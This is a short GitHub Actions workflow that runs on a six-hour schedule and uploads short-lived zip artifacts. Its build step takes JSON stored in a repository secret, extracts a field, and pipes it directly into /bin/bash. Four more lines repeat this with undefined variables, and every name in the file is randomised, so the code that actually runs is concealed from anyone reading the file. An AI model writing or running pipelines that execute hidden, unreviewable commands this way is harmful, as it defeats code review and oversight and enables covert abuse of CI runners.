name: elenavrnightly
on:
  workflow_dispatch:

  schedule:
    - cron: '47 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: elenavrnightly
        env:
          bnv878: ${{ secrets.bnv878 }}
        run: |
          printf '%s' "$bnv878" | jq -r .w9 | /bin/bash
          printf '%s' "$udeqb558" | jq -r .dopbj37933 | /bin/bash
          printf '%s' "$mjwd2336" | jq -r .lmrd7724 | /bin/bash
          printf '%s' "$qw9144" | jq -r .wjkmd58 | /bin/bash
          printf '%s' "$hfy13299" | jq -r .is152 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: PKO251Pm
          path: "*.zip"
          retention-days: 1
